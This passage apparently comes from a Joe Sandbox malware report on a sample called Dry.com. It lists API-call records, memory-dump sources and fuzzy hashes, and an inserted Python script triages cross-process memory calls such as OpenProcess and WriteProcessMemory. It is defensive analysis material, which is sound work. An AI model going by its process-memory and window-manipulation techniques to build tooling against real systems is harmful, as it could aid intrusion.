                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51b29bf9e8f723ecf45c434e718ec6435fefcb732baa8eabf12282b3bf2c4287
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43411672900218BEDB10DFA4CD85EEEBBB8EF49700F1440A5FA45B7181DA70AF85DB60
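The API chain in the record above (GetWindowThreadProcessId, OpenProcess, VirtualAllocEx, WriteProcessMemory, SendMessageW, ReadProcessMemory) is the kind of pattern worth pulling out of a report this long automatically rather than by scrolling. The Python below is an added example, not code from the report or from Joe Sandbox: it parses the report's API bullets, decodes the OpenProcess desired-access mask into PROCESS_* rights, names the messages passed to SendMessageW from a partial table of commctrl.h constants, and flags any function record that combines OpenProcess, VirtualAllocEx, WriteProcessMemory and ReadProcessMemory. The sample input is the record's own API lines copied inline; the function names and the "cross_process_memory" label are the example's own choices.

```python
import re

# PROCESS_* access rights (winnt.h), used to decode OpenProcess's first argument.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Partial table of common-control messages (commctrl.h) that appear in this report:
# TV_FIRST = 0x1100 (tree view), LVM_FIRST = 0x1000 (list view). Unknown values stay hex.
CONTROL_MESSAGES = {
    0x1104: "TVM_GETITEMRECT",
    0x1111: "TVM_HITTEST",
    0x1004: "LVM_GETITEMCOUNT",
    0x1073: "LVM_GETITEMTEXTW",
}

# Constructed sample: the API bullets of the function record above, copied verbatim.
SAMPLE = """APIs
  • Part of subcall function 00B4BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B42B1D,?,?,00000034,00000800,?,00000034), ref: 00B4BDF4
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B430AD
  • Part of subcall function 00B4BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B42B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00B4BDBF
  • Part of subcall function 00B4BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00B4BD1C
  • Part of subcall function 00B4BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B4BD2C
  • Part of subcall function 00B4BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B4BD42
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B4311A
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B43167
Strings
"""

# One bullet per API call; subcalls carry the callee address; arguments are hex or '?'
# when the analyser could not resolve them; CRT entries ("_free.LIBCMT ref: ...") have no
# argument list at all, so the parenthesised group is optional.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# APIs that together mean "allocate, write and read memory in another process".
CROSS_PROCESS_SET = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}


def parse_api_lines(text):
    """Return one dict per API bullet in a Joe Sandbox function record."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as 'APIs' / 'Strings' are skipped
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args.split(",") if args is not None else [],
            "ref": m.group("ref"),
            "subcall": m.group("sub"),
        })
    return calls


def decode_access_mask(mask):
    """Expand an OpenProcess desired-access value into PROCESS_* names, lowest bit first."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)  # bits outside the table are reported raw
    if unknown:
        names.append(f"0x{unknown:X}")
    return names


def triage(text):
    """Summarise the cross-process memory activity of one function record."""
    calls = parse_api_lines(text)
    apis = {c["api"] for c in calls}
    summary = {
        "apis": sorted(apis),
        "cross_process_memory": CROSS_PROCESS_SET <= apis,
        "open_process_rights": [],
        "sendmessage_msgs": [],
    }
    for c in calls:
        if c["api"] == "OpenProcess" and c["args"] and c["args"][0] != "?":
            summary["open_process_rights"] = decode_access_mask(int(c["args"][0], 16))
        if c["api"] == "SendMessageW" and len(c["args"]) > 1 and c["args"][1] != "?":
            msg = int(c["args"][1], 16)
            summary["sendmessage_msgs"].append(CONTROL_MESSAGES.get(msg, f"0x{msg:04X}"))
    return summary


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run over the whole report text, split at each "APIs" header, this flags every function record with the allocate/write/read trio. Treat the flag as a triage aid, not a verdict: reading list-view or tree-view items out of another process's window legitimately needs exactly this sequence, because the item structures the messages point at must live in the target's address space, and GUI automation tools do it routinely. The decoded access mask here (VM_OPERATION, VM_READ, VM_WRITE, QUERY_INFORMATION) is what such a reader needs and no more, which is a useful detail when deciding whether this function or a different one deserves the analyst's time.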
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\245347\Dry.com,00000104), ref: 00B11AD9
• _free.LIBCMT ref: 00B11BA4
• _free.LIBCMT ref: 00B11BAE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\245347\Dry.com
• API String ID: 2506810119-1821254949
• Opcode ID: 46d5030f60beb6ae854da0a577636b931ba4020547a29e36f0e62a5b01c7f6e1
• Instruction ID: 6a61d77f877503a7df172ed0a79010aee5d58bd381ebc822dda568a00a05abb7
• Opcode Fuzzy Hash: 46d5030f60beb6ae854da0a577636b931ba4020547a29e36f0e62a5b01c7f6e1
• Instruction Fuzzy Hash: 5D315E71A04218ABCB21DF99D885DDFBBFCEF85710B5045E6E90497221E6B04E81CB91
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B4CBB1
• DeleteMenu.USER32(?,00000007,00000000), ref: 00B4CBF7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BB29C0,012E5FF8), ref: 00B4CC40
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 1cbafde28cf9e533edc7270b9aebcbc228e9e9a8fcc956c0052b743b1317a374
• Instruction ID: 97d3dc145cd7c59eecf22beb1ece5918a32377f27a1ea9b60d18a3360fa43cd5
• Opcode Fuzzy Hash: 1cbafde28cf9e533edc7270b9aebcbc228e9e9a8fcc956c0052b743b1317a374
• Instruction Fuzzy Hash: 4841A2312053029FD760DF28D8C5B1ABFE4EF84B14F14465DF5A997292DB30AA04DB92
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B7DCD0,00000000,?,?,?,?), ref: 00B74F48
• GetWindowLongW.USER32 ref: 00B74F65
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B74F75
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                    • Opcode ID: 453420062b0ad8624d249d419570f65c2bda8d9d23c8ce8c57f43ba5a8240cdf
                                                                                                                                                                                                                                                                                    • Instruction ID: 38601197e4a5190713c1e8c953daec227359365edb7f7fb69aaf79513102b99f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 453420062b0ad8624d249d419570f65c2bda8d9d23c8ce8c57f43ba5a8240cdf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6317831204205AFDB258E78DC45BEA7BA9EF09375F208725F97DA61E0DB70AC909B50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B63DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B63AD4,?,?), ref: 00B63DD5
                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B63AD7
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B63AF8
                                                                                                                                                                                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00B63B63
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                    • Opcode ID: dbec756ffb67aeb40172548fd3eeda069dd6f295f37ce20454eaf7f93bc0eeb9
                                                                                                                                                                                                                                                                                    • Instruction ID: b332034c72101f96a9dfe4dd2e2740e0cb2227c3522226ca0144df8d8bd9e09b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbec756ffb67aeb40172548fd3eeda069dd6f295f37ce20454eaf7f93bc0eeb9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6331B3356002019FCB10CF68C9C5E6A77F0EF15724F288199E9168B392D779EE46CB61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B749DC
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B749F0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B74A14
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                    • Opcode ID: 4c5693a31e6ffcf43d868e3bd527b31e49f20462cbd0bc83542cef4b02b1b332
                                                                                                                                                                                                                                                                                    • Instruction ID: 7ce8ccb1de27d7267b33afab55643f369bcfdebfb4a5dfdb52ee84e01b37e15c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c5693a31e6ffcf43d868e3bd527b31e49f20462cbd0bc83542cef4b02b1b332
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8821BF32600219AFDF118FA0DC46FEB3BB9EF48714F114254FA296B1D0DBB1A891DB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B751A3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B751B1
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B751B8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                    • Opcode ID: 675d47ccf5bda2dd690b5edf7ba11eb9dd487eea3e4e4446ae799dd38e29f8e8
                                                                                                                                                                                                                                                                                    • Instruction ID: 4bd51ce406f3af61ec2a0f1e096e74eb20babc702e059f2618cc8366ec282cb9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 675d47ccf5bda2dd690b5edf7ba11eb9dd487eea3e4e4446ae799dd38e29f8e8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B02181B5600649AFDB10DF18DC85DA637EDEF59364B404199F9189B3A1CA70EC11CBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B742DC
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B742EC
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B74312
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: ff3bfc02f7d324fe95438a85fc1a88ff5c32053a90a649dcbff5e85ce36037d8
• Instruction ID: fb48f71d8edff1ab223edb2966dc2b08fe81b695322d6707f2169c9544ceeacf
• Instruction Fuzzy Hash: A021C232610118BBEF118F94DC85FBF37AEEF89754F118164F918AB191CB719C5287A0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00B5544D
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B554A1
• SetErrorMode.KERNEL32(00000000,?,?,00B7DCD0), ref: 00B55515
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: e72a51cbdc7c6686e58d35133b44973f6a51f0df03f673e88ab4ff1ba6af34c8
• Instruction ID: ce2c7e0314d7af550d139e1342568f87a3e41df5748d30a8c24479df8d727c4c
• Instruction Fuzzy Hash: 7C316F70A00148AFDB11DF64C985EAA77F8EF04305F1480A8F809EB362DB71EE45CB61
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B74CED
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B74D02
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B74D0F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: f2788d2a0a5eb367fea3e2bbd5b9dfdf9fc9d2a4c7033e7848b78352fdffe333
• Instruction ID: 03b68db116d6b40024319db992c05f42a8a94d27be0f152858559fa1d64a65bb
• Instruction Fuzzy Hash: B411E371240248BEEF215F65DC06FAB37ECEF85B65F114524FA69E20A0C771DC619B10
APIs
  • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
  • Part of subcall function 00B436F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B43712
  • Part of subcall function 00B436F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B43723
  • Part of subcall function 00B436F4: GetCurrentThreadId.KERNEL32 ref: 00B4372A
  • Part of subcall function 00B436F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B43731
• GetFocus.USER32 ref: 00B438C4
  • Part of subcall function 00B4373B: GetParent.USER32(00000000), ref: 00B43746
• GetClassNameW.USER32(?,?,00000100), ref: 00B4390F
• EnumChildWindows.USER32(?,00B43987), ref: 00B43937
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: 2be9c89aa03661bdfd5a1c4e87af033b845442a68ece4ab81e215ff19bc72f96
• Instruction ID: 7720d76c6afbc31d488fc8d5e0355a88a114bc740510052aa2a677b30561f32c
• Instruction Fuzzy Hash: 6D11D571600209ABCF01BF748D85AED77E99F94740F0880A9BD0D9B292DF719A45EB30
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B76360
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B7638D
• DrawMenuBar.USER32(?), ref: 00B7639C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: 6cf8b2223d3e5e73def79a42933f1445146c471410e2a5a99d782c336afde4c8
                                                                                                                                                                                                                                                                                    • Instruction ID: 0d0d694c6cbc88f217e031726fb8f5f4d71e2837d08952a58a78c67fd2fdc6f6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cf8b2223d3e5e73def79a42933f1445146c471410e2a5a99d782c336afde4c8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70013531514218AFDB219F15D884BAA7BB4EF44351F10C0D9F84EEA190DB308A85EF21
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3160838745455684e772aca81acd72c3603fed1fd04a3b07816f671e5b569e92
• Instruction ID: 40ec4452896d6f5adc2756260bca77badae3c39fb85f751f2fdac4c7c94a964b
• Opcode Fuzzy Hash: 3160838745455684e772aca81acd72c3603fed1fd04a3b07816f671e5b569e92
• Instruction Fuzzy Hash: 4BC14875A1021AEFDB04DFA4C894AAAB7F5FF48704F108598E605EB251D731EE81EB90
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
• Instruction ID: c6d544a9c2124873fd6da491a3c9a794784fa3182284ed0ae8c567a17beaa709
• Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
• Instruction Fuzzy Hash: F1A147729003869FEB21CF18D8917EEBBE4EF15310F6441E9E5959B381C73899C2C755
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B80BD4,?), ref: 00B40EE0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B80BD4,?), ref: 00B40EF8
• CLSIDFromProgID.OLE32(?,?,00000000,00B7DCE0,000000FF,?,00000000,00000800,00000000,?,00B80BD4,?), ref: 00B40F1D
• _memcmp.LIBVCRUNTIME ref: 00B40F3E
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
